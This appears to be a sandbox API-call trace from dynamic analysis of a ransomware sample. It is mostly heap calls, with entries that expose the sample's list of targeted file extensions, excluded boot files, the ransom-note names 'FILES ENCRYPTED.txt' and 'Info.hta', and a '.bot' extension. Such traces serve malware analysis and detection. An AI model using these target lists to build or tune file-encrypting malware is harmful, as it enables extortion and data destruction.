	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4c48
	[0030.927] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df26d0, Size=0x100) returned 0x7df45a0
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4c60
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4c78
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4c90
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df4ca8
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4cc0
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4cd8
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7dcf308
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4cf0
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4d08
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4d20
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x6) returned 0x7dcf318
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4d38
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4d50
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7df1680
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4d68
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4d80
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df4d98
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4db0
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4dc8
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4de0
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xe) returned 0x7df4df8
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4e10
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df4e28
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4e40
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4e58
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4e70
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4e88
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7df1690
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4ea0
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4eb8
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4ef8
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4f10
	[0030.928] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df45a0, Size=0x200) returned 0x7df45a0
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4f28
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7df2858
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4f40
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4f58
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4f70
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4f88
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4fa0
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4fb8
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4fd0
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4fe8
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5000
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df5018
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df5030
	[0030.928] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5048
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5060
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df5078
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df5090
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df50a8
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df50c0
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df50d8
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df50f0
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5108
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5120
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7df2868
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5138
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5150
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5168
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7df2878
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5180
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df5198
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df51b0
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df51c8
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df51e0
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df51f8
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5210
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5228
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df5240
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df5258
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5270
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5288
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df52a0
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df52b8
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df52f8
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5310
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5328
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5340
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5358
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5370
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5388
	[0030.929] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7e177a0
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x6) returned 0x7e177b0
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df53a0
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df53b8
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df53d0
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df53e8
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5400
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df5418
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5430
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5448
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5460
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5478
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df5490
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df54a8
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df54c0
	[0030.930] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df45a0, Size=0x400) returned 0x7e17b88
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df54d8
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df54f0
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df5508
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5520
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5538
	[0030.930] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df5550
	[0030.930] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17b88, Size=0x800) returned 0x7e18b90
	[0030.931] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776
	[0030.931] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e06778 | out: hHeap=0x7d60000) returned 1
	[0030.931] lstrlenW (lpString="") returned 0
	[0030.931] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e19530 | out: hHeap=0x7d60000) returned 1
	[0030.931] lstrlenW (lpString=".bot") returned 4
	[0030.931] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf398, Size=0x8) returned 0x7dcf398
	[0030.931] lstrlenW (lpString=".bot") returned 4
	[0030.931] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e19530 | out: hHeap=0x7d60000) returned 1
	[0030.931] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e19560, Size=0x20) returned 0x7dcf960
	[0030.931] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf960, Size=0x40) returned 0x7dcff48
	[0030.931] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcff48, Size=0x80) returned 0x7df26d0
	[0030.931] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17870, Size=0x8) returned 0x7e17880
	[0030.931] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17880, Size=0x10) returned 0x7e19560
	[0030.931] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e19560, Size=0x20) returned 0x7dcfcd0
	[0030.931] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48
	[0030.931] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df26d0 | out: hHeap=0x7d60000) returned 1
	[0030.931] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e19590, Size=0x20) returned 0x7dcf938
	[0030.931] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf938, Size=0x40) returned 0x7dcff48
	[0030.931] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19
	[0030.931] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19
	[0030.931] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcff48 | out: hHeap=0x7d60000) returned 1
	[0030.931] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e19590, Size=0x20) returned 0x7dcf938
	[0030.931] lstrlenW (lpString="Info.hta") returned 8
	[0030.931] lstrlenW (lpString="Info.hta") returned 8
	[0030.931] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf938 | out: hHeap=0x7d60000) returned 1
	[0030.931] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7e19798, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gjfkyfli;.exe")) returned 0x33
	[0030.931] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e19798 | out: hHeap=0x7d60000) returned 1
	[0030.932] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcfcd0, Size=0x40) returned 0x7dcff48
	[0030.932] lstrlenW (lpString=".exe") returned 4
	[0030.932] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e195a8, Size=0x20) returned 0x7dcfcd0
	[0030.932] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e195a8, Size=0x20) returned 0x7dcf938
	[0030.932] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf938, Size=0x40) returned 0x7dcff90
	[0030.932] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcff90, Size=0x80) returned 0x7df45a0
	[0030.932] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df45a0, Size=0x100) returned 0x7df45a0
	[0030.932] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0030.932] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df45a0 | out: hHeap=0x7d60000) returned 1
	[0030.932] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x7e19798, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc
	[0030.932] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e297a0 | out: hHeap=0x7d60000) returned 1
	[0030.932] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e19798 | out: hHeap=0x7d60000) returned 1
	[0030.932] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17880, Size=0x8) returned 0x7e17870
	[0030.932] lstrlenW (lpString="%windir%;") returned 9
	[0030.932] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcfcd0 | out: hHeap=0x7d60000) returned 1
	[0030.932] lstrlenW (lpString="C:\\Windows;") returned 11
	[0030.932] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e07780 | out: hHeap=0x7d60000) returned 1
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e195c0, Size=0x20) returned 0x7dcfcd0
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcfcd0, Size=0x40) returned 0x7dcff90
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcff90, Size=0x80) returned 0x7df45a0
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df45a0, Size=0x100) returned 0x7df45a0
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e178b0, Size=0x8) returned 0x7e178c0
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e178c0, Size=0x10) returned 0x7e19608
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e19608, Size=0x20) returned 0x7dcfcd0
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17880, Size=0x8) returned 0x7e178c0
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17890, Size=0x8) returned 0x7e17880
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e178b0, Size=0x8) returned 0x7e178d0
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e178d0, Size=0x10) returned 0x7e196b0
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e196b0, Size=0x20) returned 0x7dcf938
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e178c0, Size=0x10) returned 0x7e196b0
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17880, Size=0x10) returned 0x7e196e0
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e178c0, Size=0x8) returned 0x7e178b0
	[0030.933] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e178e0, Size=0x8) returned 0x7e178f0
	[0030.934] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e196b0, Size=0x20) returned 0x7df2ae0
	[0030.934] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e196e0, Size=0x20) returned 0x7df2a90
	[0030.934] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17900, Size=0x8) returned 0x7e17910
	[0030.934] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91
	[0030.934] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df45a0 | out: hHeap=0x7d60000) returned 1
	[0030.934] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e19758, Size=0x20) returned 0x7df2b08
	[0030.934] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x7e06778, nSize=0x7fff | out: lpDst="C:") returned 0x3
	[0030.934] lstrlenW (lpString="C:\\") returned 3
	[0030.934] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18f86c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18f86c*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0030.935] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e06778 | out: hHeap=0x7d60000) returned 1
	[0030.935] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17940, Size=0x82) returned 0x7e06c00
	[0030.935] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17960, Size=0x100) returned 0x7e06c90
	[0030.935] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e06c00, Size=0x104) returned 0x7e06eb8
	[0030.935] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e06c90, Size=0x200) returned 0x7e06fc8
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e17950 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e06fc8 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e06808 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df4848 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e067c0 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e06b78 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e067f0 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e06eb8 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e067d8 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e06d98 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e06820 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e06e28 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e06838 | out: hHeap=0x7d60000) returned 1
	[0030.936] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e06838, Size=0x20) returned 0x7df2b30
	[0030.936] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2b30, Size=0x40) returned 0x7dcff90
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e17920 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e19758 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df47b8 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e06790 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df4730 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e19770 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e17930 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e067a8 | out: hHeap=0x7d60000) returned 1
	[0030.936] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df4700 | out: hHeap=0x7d60000) returned 1
	[0030.937] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df1b88 | out: hHeap=0x7d60000) returned 1
	[0030.937] lstrlenW (lpString="%systemdrive%") returned 13
	[0030.937] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2b08 | out: hHeap=0x7d60000) returned 1
	[0030.937] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df45a0 | out: hHeap=0x7d60000) returned 1
	[0030.937] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e17900 | out: hHeap=0x7d60000) returned 1
	[0030.937] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x7df6758, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104
	[0030.940] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e067a8, Size=0x20) returned 0x7df2b30
	[0030.940] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2b30, Size=0x40) returned 0x7dcffd8
	[0030.940] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcffd8, Size=0x80) returned 0x7df4700
